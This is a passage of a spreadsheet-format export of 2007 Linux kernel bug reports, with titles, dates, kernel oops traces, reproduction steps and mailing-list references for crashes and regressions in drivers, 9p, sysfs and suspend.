clean Device UUID : 94d99dda:bad0be35:e7277499:669fbc48 Internal Bitmap : -222 sectors from superblock Update Time : Sat Sep 15 01:09:44 2007 Checksum : 403e2ba6 - correct Events : 8 Chunk Size : 64K Array Slot : 0 (0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11) Array State : Uuuuuuuuuuuu Steps to reproduce: every partition used is 462672000 sectors, 28800 cyls on a 500GB drive, and is a LOGICAL volume not a primary volume mdadm -C -e 1.0 -l 6 -b internal /dev/md3 -vv -n 12</t>
  </si>
  <si>
    <t>Oops on sky2, delete_module causes SIGKILL</t>
  </si>
  <si>
    <t>linux-2.6.23-git17</t>
  </si>
  <si>
    <t>2007-10-22 06:58 UTC</t>
  </si>
  <si>
    <t>2007-10-24 00:49 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: linux-2.6.23-git-13 Distribution: gentoo Hardware Environment: macbook revision2 Software Environment: gcc-4.2.2, glibc-2.6.1-r0, 2.6.23-git14...17 x86_64 sys-devel/binutils: 2.18-r1 sys-apps/module-init-tools-3.2.2-r3 Problem Description: on dmesg sky2 eth0: enabling interface sky2 eth0: Link is up at 100 Mbps, full duplex, flow control both hda: selected mode 0x44 appletouch: incomplete data package (first byte: 2, length: 4). Unable to handle kernel NULL pointer dereference at 00000000000003b0 RIP: [&lt;ffffffff804ae161&gt;] unregister_netdevice+0x21/0x180 PGD abb2067 PUD 3ee9067 PMD 0 Oops: 0000 [1] SMP CPU 1 Modules linked in: snd_hda_intel snd_pcm snd_page_alloc i2c_i801 sky2 Pid: 4791, comm: modprobe Not tainted 2.6.23-git17 #2 RIP: 0010:[&lt;ffffffff804ae161&gt;] [&lt;ffffffff804ae161&gt;] unregister_netdevice+0x21/0x180 RSP: 0018:ffff81000a9addf8 EFLAGS: 00010246 RAX: 0000000000000000 RBX: 0000000000000000 RCX: 00000000ffffffff RDX: 0000000000000000 RSI: 0000000000000000 RDI: ffffffff80639050 RBP: ffff810003da5e80 R08: 0000000000000000 R09: 000000000000102a R10: 0000000000000000 R11: ffffffff8029f6a0 R12: ffff8100022c0800 R13: ffffffff8800c440 R14: ffffffff8800c498 R15: ffffffff8800c490 FS: 00002b16510c3b00(0000) GS:ffff810002076e40(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b CR2: 00000000000003b0 CR3: 000000000aaf4000 CR4: 00000000000026e0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 Process modprobe (pid: 4791, threadinfo ffff81000a9ac000, task ffff810003e1a740) Stack: 0000000000000000 ffffffff804ae2d1 0000000000000000 ffffffff88004670 ffff8100022c0870 ffff8100022c0800 ffff8100022c6870 ffffffff80393a4c ffffffff8800c440 ffff8100022c0870 ffffffff8800c440 ffffffff803f91c2 Call Trace: [&lt;ffffffff804ae2d1&gt;] unregister_netdev+0x11/0x20 [&lt;ffffffff88004670&gt;] :sky2:sky2_remove+0x40/0xf0 [&lt;ffffffff80393a4c&gt;] pci_device_remove+0x2c/0x60 [&lt;ffffffff803f91c2&gt;] __device_release_driver+0x82/0xc0 [&lt;ffffffff803f9805&gt;] driver_detach+0xf5/0x100 [&lt;ffffffff803f8c2d&gt;] bus_remove_driver+0x8d/0xb0 [&lt;ffffffff80393ab8&gt;] pci_unregister_driver+0x18/0x90 [&lt;ffffffff8025e19d&gt;] sys_delete_module+0x14d/0x1e0 [&lt;ffffffff80384e82&gt;] __up_write+0x22/0x130 [&lt;ffffffff8020bc5e&gt;] system_call+0x7e/0x83 Code: 8b 83 b0 03 00 00 85 c0 75 39 48 89 da 48 89 de 48 c7 c7 20 RIP [&lt;ffffffff804ae161&gt;] unregister_netdevice+0x21/0x180 RSP &lt;ffff81000a9addf8&gt; CR2: 00000000000003b0 Steps to reproduce: rmmod sky2</t>
  </si>
  <si>
    <t>9p: unmount userspace  server causes crash</t>
  </si>
  <si>
    <t>2007-10-22 11:00 UTC</t>
  </si>
  <si>
    <t>2010-01-28 14:59 UTC</t>
  </si>
  <si>
    <t>From: sqweek@gmail.com Hi guys, I've been working on an SUID 9mount/9umount recently for mounting 9p file systems in userspace, and with all the mount/unmounting going on I managed to crash v9fs a couple of times. Running linux-2.6.22, both times v9fs choked I was unmounting p9p's factotum (unix!/tmp/ns.sqweek.:0/factotum). Anyway, here's the first dump: BUG: unable to handle kernel NULL pointer dereference at virtual address 00000001 printing eip: c011176a *pde = 00000000 Oops: 0000 [#1] PREEMPT Modules linked in: nvidia(P) CPU: 0 EIP: 0060:[&lt;c011176a&gt;] Tainted: P VLI EFLAGS: 00010086 (2.6.22 #1) EIP is at __wake_up_common+0x13/0x4f eax: 00000001 ebx: f7cac000 ecx: 00000001 edx: 00000003 esi: 00000000 edi: 00000001 ebp: f7cadeac esp: f7cade90 ds: 007b es: 007b fs: 0000 gs: 0000 ss: 0068 Process v9fs/0 (pid: 202, ti=f7cac000 task=f7d65590 task.ti=f7cac000) Stack: f7d65590 00000003 f2b83adc c033b45d f7cac000 00000000 00000286 f7cadec8 c0112844 00000000 00000000 f7032d20 f2b83aa0 f7032d3c f6848000 c01d43f3 00000000 f7caded0 00000000 00000000 c02f2d67 f7cade34 00000001 0000000a Call Trace: [&lt;c033b45d&gt;] preempt_schedule+0x3c/0x58 [&lt;c0112844&gt;] __wake_up+0x2a/0x4f [&lt;c01d43f3&gt;] v9fs_read_work+0x42c/0x511 [&lt;c02f2d67&gt;] net_tx_action+0x5a/0xc8 [&lt;c0118f89&gt;] __do_softirq+0x35/0x75 [&lt;c01191ae&gt;] irq_exit+0x25/0x30 [&lt;c014d0cb&gt;] vfs_write+0xfc/0x10c [&lt;c01d2874&gt;] v9fs_fd_write+0x85/0xbf [&lt;c01d384d&gt;] v9fs_write_work+0x0/0x1ca [&lt;c01d392f&gt;] v9fs_write_work+0xe2/0x1ca [&lt;c01d3fc7&gt;] v9fs_read_work+0x0/0x511 [&lt;c01d3fc7&gt;] v9fs_read_work+0x0/0x511 [&lt;c0121379&gt;] run_workqueue+0x8c/0x128 [&lt;c01218ac&gt;] worker_thread+0x0/0xbc [&lt;c012195e&gt;] worker_thread+0xb2/0xbc [&lt;c0123f37&gt;] autoremove_wake_function+0x0/0x35 [&lt;c0123e7f&gt;] kthread+0x36/0x5b [&lt;c0123e49&gt;] kthread+0x0/0x5b [&lt;c0103eb3&gt;] kernel_thread_helper+0x7/0x10 ======================= Code: c0 11 15 0c 62 43 c0 eb 0c 01 1d 18 62 43 c0 11 15 1c 62 43 c0 5b c9 c3 55 89 e5 57 89 cf 56 53 83 ec 10 89 45 ec 89 55 e8 8b 00 &lt;8b&gt; 30 eb 2b 8d 58 f4 8b 40 f4 8b 4d 08 8b 55 e8 89 45 f0 8b 45 EIP: [&lt;c011176a&gt;] __wake_up_common+0x13/0x4f SS:ESP 0068:f7cade90 note: v9fs/0[202] exited with preempt_count 1 Second time around I captured everything v9fs related in dmesg instead of just the dump... I don't think there's anything useful in there: Installing v9fs 9p2000 file system support ... v9fs: v9fs_tcp_init (20745): v9fs_trans_tcp: problem connecting socket to 192.168.1.86 v9fs: v9fs_session_init (20745): problem initializing transport v9fs: v9fs_tcp_init (28973): v9fs_trans_tcp: problem connecting socket to 192.168.1.86 v9fs: v9fs_session_init (28973): problem initializing transport v9fs: v9fs_tcp_init (29050): v9fs_trans_tcp: problem connecting socket to 192.168.1.86 v9fs: v9fs_session_init (29050): problem initializing transport v9fs_errstr2errno: errstr :interrupted: not found ... 9P2000: v9fs_t_read returned -512 BUG: unable to handle kernel NULL pointer dereference at virtual address 00000001 printing eip: c011176a *pde = 00000000 Oops: 0000 [#1] PREEMPT Modules linked in: nvidia(P) CPU: 0 EIP: 0060:[&lt;c011176a&gt;] Tainted: P VLI EFLAGS: 00010086 (2.6.22 #1) EIP is at __wake_up_common+0x13/0x4f eax: 00000001 ebx: f7cac000 ecx: 00000001 edx: 00000003 esi: 00000000 edi: 00000001 ebp: f7cadeac esp: f7cade90 ds: 007b es: 007b fs: 0000 gs: 0000 ss: 0068 Process v9fs/0 (pid: 202, ti=f7cac000 task=f7d65590 task.ti=f7cac000) Stack: f7d65590 00000003 d86bdb9c c033b45d f7cac000 00000000 00000286 f7cadec8 c0112844 00000000 00000000 e68e0820 d86bdb60 e68e083c c3594000 c01d43f3 00000000 f7caded0 00000000 00000000 c0122153 f7cade34 c718800c c043b568 Call Trace: [&lt;c033b45d&gt;] preempt_schedule+0x3c/0x58 [&lt;c0112844&gt;] __wake_up+0x2a/0x4f [&lt;c01d43f3&gt;] v9fs_read_work+0x42c/0x511 [&lt;c0122153&gt;] __rcu_process_callbacks+0x112/0x170 [&lt;c0118f89&gt;] __do_softirq+0x35/0x75 [&lt;c01191ae&gt;] irq_exit+0x25/0x30 [&lt;c014d0cb&gt;] vfs_write+0xfc/0x10c [&lt;c01d2874&gt;] v9fs_fd_write+0x85/0xbf [&lt;c033b37f&gt;] __sched_text_start+0x497/0x539 [&lt;c01d3fc7&gt;] v9fs_read_work+0x0/0x511 [&lt;c01d3fc7&gt;] v9fs_read_work+0x0/0x511 [&lt;c0121379&gt;] run_workqueue+0x8c/0x128 [&lt;c01218ac&gt;] worker_thread+0x0/0xbc [&lt;c012195e&gt;] worker_thread+0xb2/0xbc [&lt;c0123f37&gt;] autoremove_wake_function+0x0/0x35 [&lt;c0123e7f&gt;] kthread+0x36/0x5b [&lt;c0123e49&gt;] kthread+0x0/0x5b [&lt;c0103eb3&gt;] kernel_thread_helper+0x7/0x10 ======================= Code: c0 11 15 0c 62 43 c0 eb 0c 01 1d 18 62 43 c0 11 15 1c 62 43 c0 5b c9 c3 55 89 e5 57 89 cf 56 53 83 ec 10 89 45 ec 89 55 e8 8b 00 &lt;8b&gt; 30 eb 2b 8d 58 f4 8b 40 f4 8b 4d 08 8b 55 e8 89 45 f0 8b 45 EIP: [&lt;c011176a&gt;] __wake_up_common+0x13/0x4f SS:ESP 0068:f7cade90 note: v9fs/0[202] exited with preempt_count 1 Finally, awhile back I ran into other unmounting problems. This was back on a linux-2.6.19 kernel, so might be fixed now anyway... I was unmounting a 9p2000.u fs served by ufs (spfs) from my netbsd machine. kernel BUG at kernel/workqueue.c:114! invalid opcode: 0000 [#1] PREEMPT Modules linked in: nvidia(P) CPU: 0 EIP: 0060:[&lt;c01227e8&gt;] Tainted: P VLI EFLAGS: 00010213 (2.6.19 #4) EIP is at queue_work+0x21/0x4f eax: f70904d4 ebx: 00000000 ecx: f7d203a0 edx: f70904d0 esi: 00000004 edi: c045f5e4 ebp: c045f5e0 esp: f18a7f94 ds: 007b es: 007b ss: 0068 Process v9fs-poll (pid: 3191, ti=f18a6000 task=f1d9d090 task.ti=f18a6000) Stack: f7090400 c01de1a5 f2d396a0 00000000 f1d9d090 00000f21 00000000 c045f5e0 f08d9cf4 c01ddf73 00000000 c01258aa c045f5e0 f18a7fd0 00000000 ffffffff ffffffff c01257e5 00000000 00000000 c010306b f08d9cf4 00000000 00000000 Call Trace: [&lt;c01de1a5&gt;] v9fs_poll_proc+0x232/0x2d1 [&lt;c01ddf73&gt;] v9fs_poll_proc+0x0/0x2d1 [&lt;c01258aa&gt;] kthread+0xc5/0xf3 [&lt;c01257e5&gt;] kthread+0x0/0xf3 [&lt;c010306b&gt;] kernel_thread_helper+0x7/0x10 ======================= Code: 54 24 04 8b 42 14 8b 00 eb 8d 53 89 c1 89 e0 25 00 e0 ff ff ff 40 14 0f ba 2a 00 19 c0 31 db 85 c0 75 1c 8d 42 04 39 42 04 74 08 &lt;0f&gt; 0b 72 00 18 f4 37 c0 8b 01 bb 01 00 00 00 e8 58 ff ff ff 89 EIP: [&lt;c01227e8&gt;] queue_work+0x21/0x4f SS:ESP 0068:f18a7f94 &lt;6&gt;note: v9fs-poll[3191] exited with preempt_count 1 kernel BUG at kernel/workqueue.c:114! invalid opcode: 0000 [#1] PREEMPT Modules linked in: nvidia(P) CPU: 0 EIP: 0060:[&lt;c01227e8&gt;] Tainted: P VLI EFLAGS: 00010213 (2.6.19 #4) EIP is at queue_work+0x21/0x4f eax: f76d14d4 ebx: 00000000 ecx: f7d1f3a0 edx: f76d14d0 esi: 00000004 edi: f76d1a00 ebp: c045f5e0 esp: f5877f94 ds: 007b es: 007b ss: 0068 Process v9fs-poll (pid: 2643, ti=f5876000 task=f7c2a580 task.ti=f5876000) Stack: f76d1400 c01de1a5 f7580c60 00000000 f7c2a580 00000e73 00000000 c045f5e0 f589bcf4 c01ddf73 00000000 c01258aa c045f5e0 f5877fd0 00000000 ffffffff ffffffff c01257e5 00000000 00000000 c010306b f589bcf4 00000000 00000000 Call Trace: [&lt;c01de1a5&gt;] v9fs_poll_proc+0x232/0x2d1 [&lt;c01ddf73&gt;] v9fs_poll_proc+0x0/0x2d1 [&lt;c01258aa&gt;] kthread+0xc5/0xf3 [&lt;c01257e5&gt;] kthread+0x0/0xf3 [&lt;c010306b&gt;] kernel_thread_helper+0x7/0x10 ======================= Code: 54 24 04 8b 42 14 8b 00 eb 8d 53 89 c1 89 e0 25 00 e0 ff ff ff 40 14 0f ba 2a 00 19 c0 31 db 85 c0 75 1c 8d 42 04 39 42 04 74 08 &lt;0f&gt; 0b 72 00 18 f4 37 c0 8b 01 bb 01 00 00 00 e8 58 ff ff ff 89 EIP: [&lt;c01227e8&gt;] queue_work+0x21/0x4f SS:ESP 0068:f5877f94 &lt;6&gt;note: v9fs-poll[2643] exited with preempt_count 1 BUG: unable to handle kernel NULL pointer dereference at virtual address 00000011 printing eip: c0152a78 *pde = 00000000 Oops: 0000 [#2] PREEMPT Modules linked in: nvidia(P) CPU: 0 EIP: 0060:[&lt;c0152a78&gt;] Tainted: P VLI EFLAGS: 00010202 (2.6.19 #4) EIP is at __free_pipe_info+0x1d/0x48 eax: 00000001 ebx: f76d14c4 ecx: 00000000 edx: 00000001 esi: f76d1400 edi: 00000009 ebp: f72e04e0 esp: f1ed3f18 ds: 007b es: 007b ss: 0068 Process fish (pid: 3114, ti=f1ed2000 task=f24bcad0 task.ti=f1ed2000) Stack: f76d1400 f76d14c4 f72e04e0 00000000 f76d1400 c0152ab9 f76d1400 00000001 c0152b0e f72e04e0 ef1bfde0 f72e04e0 f72e054c 00000010 ef1bfde0 f72e04e0 f20e3514 c014dfd3 f72e04e0 ef1bfde0 00000000 00000000 00000000 c17d35a0 Call Trace: [&lt;c0152ab9&gt;] free_pipe_info+0x16/0x23 [&lt;c0152b0e&gt;] pipe_release+0x48/0xb1 [&lt;c014dfd3&gt;] __fput+0xaf/0x19b [&lt;c014b7b3&gt;] filp_close+0x61/0x69 [&lt;c014c9aa&gt;] sys_close+0x7b/0xd1 [&lt;c0102d91&gt;] sysenter_past_esp+0x56/0x79 ======================= Code: a7 00 00 89 5c 24 0c 5b 5b e9 5c b4 ff ff 57 31 ff 56 53 83 ec 08 8b 74 24 18 8d 5e 10 8b 43 0c 85 c0 74 0a 89 5c 24 04 89 34 24 &lt;ff&gt; 50 10 47 83 c3 14 83 ff 10 75 e6 8b 86 50 01 00 00 85 c0 74 EIP: [&lt;c0152a78&gt;] __free_pipe_info+0x1d/0x48 SS:ESP 0068:f1ed3f18</t>
  </si>
  <si>
    <t>9p: mv (rename) silently failing</t>
  </si>
  <si>
    <t>2007-10-22 11:02 UTC</t>
  </si>
  <si>
    <t>2008-05-03 08:38 UTC</t>
  </si>
  <si>
    <t>Sometimes a mv between directories will rename the file but leave it in the same directory. Unfortunately it's not as reproducable as I'd like, but here's the basic idea: $ mkdir a b $ touch a/c $ while mv a/c b/d &amp;&amp; mv b/d a/c; do 9 ls a b; done; 9 ls a b a/c mv: cannot stat `b/d': No such file or directory a/d The second time around when I ran the loop it seemed to be working consistently, then I ctrl-C'd it and now I have a/c *and* b/d, but attempts to access a/c are met with "Bad file descriptor". After I removed a/c and tried to recreate it I seem to have crashed u9fs. I can reproduce the problem with spfs's ufs. It took longer, and each individual mv was quicker, but I don't know if these observations are relevant or just circumstancial. Versions: linux 2.6.22 coreutils 6.9 u9fs (non .u version, from plan9) spfs/ufs ~20061225</t>
  </si>
  <si>
    <t>ide/pci/cy82c693.c:439: error: primary causes a section type conflict</t>
  </si>
  <si>
    <t>linux-2.6.24-0895e91d60ef9bdef426d1ce14bb94bd5875870d</t>
  </si>
  <si>
    <t>2007-10-23 05:19 UTC</t>
  </si>
  <si>
    <t>2007-10-28 15:21 UTC</t>
  </si>
  <si>
    <t>My randconfig script the attached config caught an error on: drivers/ide/pci/cy82c693.c:439: error: primary causes a section type conflict My git tree: 0895e91d60ef9bdef426d1ce14bb94bd5875870d Bisected to: 8562043606430185cad26d085d46adcc7ad67fd1 is first bad commit commit 8562043606430185cad26d085d46adcc7ad67fd1 Author: Bartlomiej Zolnierkiewicz &lt;bzolnier@gmail.com&gt; Date: Sat Oct 20 00:32:34 2007 +0200 ide: constify struct ide_port_info Signed-off-by: Bartlomiej Zolnierkiewicz &lt;bzolnier@gmail.com&gt; :040000 040000 27932334bd506612fc98b4b6252cf6e4765847a5 dc7d68c5747f194f7607d7419dabfefa0b116150 Mdrivers :040000 040000 8fd684141c9225d3d78e1c0e9fbbf92573429be0 ab45600da4f8e605f98079ba7e170f180dc0dec1 Minclude</t>
  </si>
  <si>
    <t>panic in show_mem on when out_of_memory</t>
  </si>
  <si>
    <t>2007-10-23 06:10 UTC</t>
  </si>
  <si>
    <t>Bernd Pfrommer</t>
  </si>
  <si>
    <t>2007-10-24 04:20 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: unknown Distribution: Fedora Core 6 x86_64 Hardware Environment: 2 x Quad Xeon Supermicro with 4GB of memory Software Environment: 64bit Problem Description: When running an application that reads a large file (8GB) into memory (4GB), a kernel panic occurs. No output occured on the serial port, so the following info was copied from the screen manually. The process that caused the panic was "init". RIP: show_mem + 0x8d/0x140 Stack: out_of_memory + 0x75 __alloc_pages __do_page_cache_readahead mntput_no_expire link_path_walk filemap_nopage __handle_mm_fault do_page_fault error_exit This is happening on an 8-way SMP (2 quad xeon processors), supermicro 6015t-tv Some kernel config info: X86_64_ACPI_NUMA is switched on no forced preemption NUMA support is on page migration is on CC_STACKPROTECTOR is on processor family is MCORE2 Steps to reproduce: run an application that reads a large file into memory</t>
  </si>
  <si>
    <t>b43 crash at PCI initialization</t>
  </si>
  <si>
    <t>2007-10-24 12:41 UTC</t>
  </si>
  <si>
    <t>2007-10-27 08:19 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.24-rc1 This is not a regression, since it's a new driver (b43) crash. I'm trying to boot with the old driver (bcm43xx) to check. Distribution: Bluewhite64 Hardware Environment: AMD Athlon 64, Broadcom 4306rev2 Wifi chipset Software Environment: Linux Problem Description: The laptop crashes at boot with b43 driver (more precisely, its dependance on ssb) as soon as the hardware is seen, apparently in PCI initialization. Steps to reproduce: Compile 2.6.24+b43/b43legacy, boot on specific hardware. crash call stack appended as a screen photo (I'm too lazy to copy it).</t>
  </si>
  <si>
    <t>Warning in sysfs for creation of wlan1 entry</t>
  </si>
  <si>
    <t>2007-10-24 12:57 UTC</t>
  </si>
  <si>
    <t>2007-11-02 02:56 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.24-rc1 This is not a regression (bug from new driver rt2500 USB). Distribution: Bluewhite64 Hardware Environment: Athlon64X2 + USB Wifi key based on rt25xx chip. Software Environment: Kernel, dmesg Problem Description: When I plug in the USB key, the driver tries to create sysfs entries. However, it seems to have problems doing so, and with Kernel+debug info I get the following warning: usb 1-4: new high speed USB device using ehci_hcd and address 4 usb 1-4: configuration #1 chosen from 1 choice phy0: Selected rate control algorithm 'simple' sysfs: duplicate filename 'wlan1' can not be created WARNING: at fs/sysfs/dir.c:424 sysfs_add_one() Call Trace: [&lt;ffffffff802ec42c&gt;] sysfs_add_one+0xac/0xe0 [&lt;ffffffff802ed4c7&gt;] sysfs_create_link+0xa7/0x160 [&lt;ffffffff80404792&gt;] device_rename+0x1c2/0x220 [&lt;ffffffff8053441c&gt;] dev_change_name+0xbc/0x240 [&lt;ffffffff80534788&gt;] dev_ifsioc+0x1e8/0x290 [&lt;ffffffff80534c41&gt;] dev_ioctl+0x411/0x590 [&lt;ffffffff805253ed&gt;] sock_ioctl+0xed/0x260 [&lt;ffffffff802af031&gt;] do_ioctl+0x31/0x90 [&lt;ffffffff802af103&gt;] vfs_ioctl+0x73/0x2d0 [&lt;ffffffff802af3aa&gt;] sys_ioctl+0x4a/0x80 [&lt;ffffffff8020bcee&gt;] system_call+0x7e/0x83 net wlan1: device_rename: sysfs_create_symlink failed (-17) Please note that this was just after testing another USB key that may have created the device (it was a zd1201 based device), but it also warns just after reboot when plugging this driver first (zd does work nicely). Using new mac80211 stack. Steps to reproduce: Kernel + driver + debug intrumentation, plug the USB device.</t>
  </si>
  <si>
    <t>Sergey Smirnov</t>
  </si>
  <si>
    <t>Laptop powers-on when closing lid - Acer Aspire 1511LMi</t>
  </si>
  <si>
    <t>2007-10-27 05:04 UTC</t>
  </si>
  <si>
    <t>2008-06-13 21:33 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.23.1 (this is a regression). Distribution: Bluewhite64 12 (64 bit version of Slackware 12). Hardware Environment: Laptop Acer Aspire 1511LMi, Athlon 64 3000, nForce3 chipset Software Environment: None / hardware bug Problem Description: When I boot the laptop, then issue a shutdown request (from KDE main menu), the laptop shuts down and power off correctly. However, once it is off, it restarted as soon as I close the lid. So I have to reopen the lid to get access to the power button and force a power off by pressing it 5s. Then I can close the lid and it stays off. So it seems the ACPI power off code issue a "restart on lid" (and maybe other kind events), even if the laptop was not suspended but really shut down. For information, suspend to RAM seem to work nicely (I use the lid event to go to hibernation mode, and the opening of the lid restarts correctly, but it should do it only after a suspend). Steps to reproduce: It may be hardware / BIOS dependant, but simply shuts down a laptop with "shutdown -Ph 0" then close the lid, it would restart.</t>
  </si>
  <si>
    <t>linux-2.6.23-git3: Many sysfs-related warnings in dmesg</t>
  </si>
  <si>
    <t>linux-2.6.23-git3</t>
  </si>
  <si>
    <t>2007-10-28 13:21 UTC</t>
  </si>
  <si>
    <t>2007-11-02 07:43 UTC</t>
  </si>
  <si>
    <t>Subject : linux-2.6.23-git3: Many sysfs-related warnings in dmesg Submitter : Rafael J. Wysocki &lt;rjw@sisk.pl&gt; References : http://lkml.org/lkml/2007/10/13/204 http://lkml.org/lkml/2007/10/26/317 Handled-By : Greg KH &lt;gregkh@suse.de&gt; Kay Sievers &lt;kay.sievers@vrfy.org&gt; Patch : http://lkml.org/lkml/2007/10/26/359</t>
  </si>
  <si>
    <t>On 2.6.24-rc1-gc9927c2b BUG: unable to handle kernel paging request at virtual address 3d15b925</t>
  </si>
  <si>
    <t>2.6.24-rc1-gc9927c2b</t>
  </si>
  <si>
    <t>2007-10-28 13:27 UTC</t>
  </si>
  <si>
    <t>2007-12-05 05:26 UTC</t>
  </si>
  <si>
    <t>Subject : On 2.6.24-rc1-gc9927c2b BUG: unable to handle kernel paging request at virtual address 3d15b925 Submitter : Giacomo Catenazzi &lt;cate@cateee.net&gt; References : http://lkml.org/lkml/2007/10/24/487</t>
  </si>
  <si>
    <t>Potential regression in -git15: can't resume stopped root shell?</t>
  </si>
  <si>
    <t>2.6.23-git15</t>
  </si>
  <si>
    <t>2007-10-28 13:31 UTC</t>
  </si>
  <si>
    <t>2007-11-16 14:09 UTC</t>
  </si>
  <si>
    <t>Serge Hallyn</t>
  </si>
  <si>
    <t>Subject : Potential regression in -git15: can't resume stopped root shell? Submitter : Theodore Tso &lt;tytso@mit.edu&gt; References : http://lkml.org/lkml/2007/10/20/114</t>
  </si>
  <si>
    <t>2.6.24-rc1 fails with lockup and BUG:</t>
  </si>
  <si>
    <t>2007-10-28 13:46 UTC</t>
  </si>
  <si>
    <t>2007-11-01 09:46 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.24-rc1 fails with lockup and BUG: Submitter : Romano Giannetti &lt;romanol@upcomillas.es&gt; References : http://lkml.org/lkml/2007/10/24/232 Handled-By : Ingo Molnar &lt;mingo@elte.hu&gt; Peter Zijlstra &lt;a.p.zijlstra@chello.nl&gt; Stephen Hemminger &lt;shemminger@linux-foundation.org&gt; Patch : http://lkml.org/lkml/2007/10/26/382</t>
  </si>
  <si>
    <t>[BUG] panic after umount (biscted)</t>
  </si>
  <si>
    <t>2007-10-28 14:07 UTC</t>
  </si>
  <si>
    <t>2007-11-07 23:38 UTC</t>
  </si>
  <si>
    <t>Subject : [BUG] panic after umount (biscted) Submitter : Sebastian Siewior &lt;lkml@ml.breakpoint.cc&gt; References : http://marc.info/?l=linux-kernel&amp;m=119338387030335&amp;w=2 Handled-By : Jens Axboe &lt;jens.axboe@oracle.com&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=119348520210349&amp;w=2</t>
  </si>
  <si>
    <t>2.6.24-rc1 sysctl table check failed on PowerMac</t>
  </si>
  <si>
    <t>2007-10-28 14:14 UTC</t>
  </si>
  <si>
    <t>2007-11-16 14:19 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.24-rc1 sysctl table check failed on PowerMac Submitter : Mikael Pettersson &lt;mikpe@it.uu.se&gt; References : http://marc.info/?l=linux-kernel&amp;m=119350802331857&amp;w=2 Handled-By : Alexey Dobriyan &lt;adobriyan@gmail.com&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=119351015801660&amp;w=2</t>
  </si>
  <si>
    <t>(sata_nv) broken in non NCQ mode</t>
  </si>
  <si>
    <t>2.6.24-rc1-gec3b67c1</t>
  </si>
  <si>
    <t>2007-10-28 14:28 UTC</t>
  </si>
  <si>
    <t>2007-11-02 17:45 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.24-rc1-gec3b67c1 broken reg. libata-sata_nv in non NCQ mode Submitter : Prakash Punnoor &lt;prakash@punnoor.de&gt; References : http://lkml.org/lkml/2007/10/27/34</t>
  </si>
  <si>
    <t>2.6.24-rc1 freezes on powerbook at first boot stage</t>
  </si>
  <si>
    <t>2007-10-28 14:32 UTC</t>
  </si>
  <si>
    <t>2007-11-16 14:23 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.24-rc1 freezes on powerbook at first boot stage Submitter : Elimar Riesebieter &lt;riesebie@lxtec.de&gt; References : http://lkml.org/lkml/2007/10/24/205</t>
  </si>
  <si>
    <t>build #286 failed for 2.6.24-rc1-gea45d15 in linux/arch/x86/kernel/setup_32.c</t>
  </si>
  <si>
    <t>2.6.24-rc1-gea45d15</t>
  </si>
  <si>
    <t>2007-10-28 14:44 UTC</t>
  </si>
  <si>
    <t>2007-11-16 14:27 UTC</t>
  </si>
  <si>
    <t>Subject : build #286 failed for 2.6.24-rc1-gea45d15 in linux/arch/x86/kernel/setup_32.c Submitter : Toralf Förster &lt;toralf.foerster@gmx.de&gt; References : http://lkml.org/lkml/2007/10/28/110 Handled-By : "H. Peter Anvin" &lt;hpa@zytor.com&gt; Patch : http://marc.info/?i=1193419828.3293.35.camel@localhost.localdomain</t>
  </si>
  <si>
    <t>2.6.24-rc1 kills onboard r8169 (rtl8111b) NIC</t>
  </si>
  <si>
    <t>2007-10-28 14:51 UTC</t>
  </si>
  <si>
    <t>2007-11-11 12:30 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.24-rc1 kills onboard r8169 (rtl8111b) NIC Submitter : "Sergey S. Kostyliov" &lt;rathamahata@gmail.com&gt; References : http://lkml.org/lkml/2007/10/28/144 Handled-By : Francois Romieu &lt;romieu@fr.zoreil.com&gt;</t>
  </si>
  <si>
    <t>EHCI causes system to resume instantly from S4</t>
  </si>
  <si>
    <t>2.6.29-rc8</t>
  </si>
  <si>
    <t>2007-10-28 14:56 UTC</t>
  </si>
  <si>
    <t>2010-10-25 18:50 UTC</t>
  </si>
  <si>
    <t>12643 12721</t>
  </si>
  <si>
    <t>Subject : Commit "Hibernation: Enter platform hibernation state in a consistent way)" makes my system to resume instantly from S4 Submitter : Maxim Levitsky &lt;maximlevitsky@gmail.com&gt; References : http://lkml.org/lkml/2007/10/27/66 Handled-By : "Rafael J. Wysocki" &lt;rjw@sisk.pl&gt;</t>
  </si>
  <si>
    <t>[2.6.24-rc1 regression] suspend fails</t>
  </si>
  <si>
    <t>2007-10-28 15:04 UTC</t>
  </si>
  <si>
    <t>2007-11-02 07:39 UTC</t>
  </si>
  <si>
    <t>Subject : [2.6.24-rc1 regression] suspend fails Submitter : Andrey Borzenkov &lt;arvidjaar@mail.ru&gt; References : http://lkml.org/lkml/2007/10/25/297 Handled-By : "Rafael J. Wysocki" &lt;rjw@sisk.pl&gt; Patch : http://marc.info/?l=linux-mm-commits&amp;m=119318609013090&amp;w=2</t>
  </si>
  <si>
    <t>tipc_config.h is not installed when doing "make headers_install"</t>
  </si>
  <si>
    <t>2007-10-29 09:10 UTC</t>
  </si>
  <si>
    <t>Martin Peylo</t>
  </si>
  <si>
    <t>2007-10-31 11:42 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.15.7 Distribution: all Hardware Environment: all Software Environment: all Problem Description: When doing "make headers_install" the file tipc_config.h is not installed. It describes the interface to configure the TIPC module and it is needed when building the config utility (tipc-config). Adding the following line to include/linux/Kbuild solves this: header-y += tipc_config.h Steps to reproduce: make headers_install</t>
  </si>
  <si>
    <t>(pata hpt374) Mishandling of port 3/4 special cases ?</t>
  </si>
  <si>
    <t>2.6.24-rc5</t>
  </si>
  <si>
    <t>2007-10-29 11:03 UTC</t>
  </si>
  <si>
    <t>2008-01-11 08:21 UTC</t>
  </si>
  <si>
